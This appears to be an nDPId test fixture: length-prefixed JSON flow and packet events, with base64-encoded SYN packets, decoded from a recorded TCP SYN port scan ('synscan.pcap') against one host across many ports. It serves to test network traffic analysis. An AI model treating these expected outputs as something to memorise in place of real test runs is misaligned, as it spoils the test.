+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsqY8AADIGbOOsEAAIQA2GNIzSIzPdUoMYAAAAAGACDAAJXAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsf8MAADYGkq+sEAAIQA2GNIzSBizdUoMYAAAAAGACDAAmYwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsUswAACYGz6asEAAIQA2GNIzSB\/jdUoMYAAAAAGACDAAklwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAs7CMAACwGME+sEAAIQA2GNIzSF+vdUoMYAAAAAGACBAAcpAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsccoAADkGnaisEAAIQA2GNIzSDvTdUoMYAAAAAGACCAAhmwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsqEQAADMGbS6sEAAIQA2GNIzSII3dUoMYAAAAAGACEAAIAgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsb6oAACoGrsisEAAIQA2GNIzSH1bdUoMYAAAAAGACDAANOQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsZRYAADAGs1ysEAAIQA2GNIzSFbPdUoMYAAAAAGACBAAe3AAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsmgoAADQGemisEAAIQA2GNIzS1xDdUoMYAAAAAGACBABdfgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsSTIAACkG1kCsEAAIQA2GNIzSCHDdUoMYAAAAAGACCAAoHwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsfbAAACoGoMKsEAAIQA2GNIzSIc7dUoMYAAAAAGACDAAKwQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAs7GIAACkGMxCsEAAIQA2GNIzSw1bdUoMYAAAAAGACCABtOAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsus4AACoGY6SsEAAIQA2GNIzSCT7dUoMYAAAAAGACDAAjUQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAszkkAADsGPymsEAAIQA2GNIzSW87dUoMYAAAAAGACEADMwAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsUbIAADYGwMCsEAAIQA2GNIzSBCfdUoMYAAAAAGACDAAoaAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsplEAADUGbSGsEAAIQA2GNIzSE4vdUoMYAAAAAGACCAAdBAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsursAADMGWresEAAIQA2GNIzSxczdUoMYAAAAAGACEABiwgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsJh4AAC4G9FSsEAAIQA2GNIzSBIDdUoMYAAAAAGACDAAoDwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsq7AAACUGd8KsEAAIQA2GNIzSatndUoMYAAAAAGACCADFtQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAs3t0AADYGM5WsEAAIQA2GNIzSG1\/dUoMYAAAAAGACDAARMAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsZAcAADUGr2usEAAIQA2GNIzSFxvdUoMYAAAAAGACCAAZdAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAs3XEAADEGOgGsEAAIQA2GNIzSBNLdUoMYAAAAAGACCAArvQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAs7\/kAADEGJ3msEAAIQA2GNIzSFyXdUoMYAAAAAGACCAAZagAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061111,"flow_last_seen":1278275061111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061111,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_packet_id":1,"flow_last_seen":1278275061111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061111,"pkt":"ACYLMQczACWzv5HuCABFAAAs8psAADoGG9esEAAIQA2GNIzSxNXdUoMYAAAAAGACDABnuQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061153,"flow_last_seen":1278275061153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061153,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 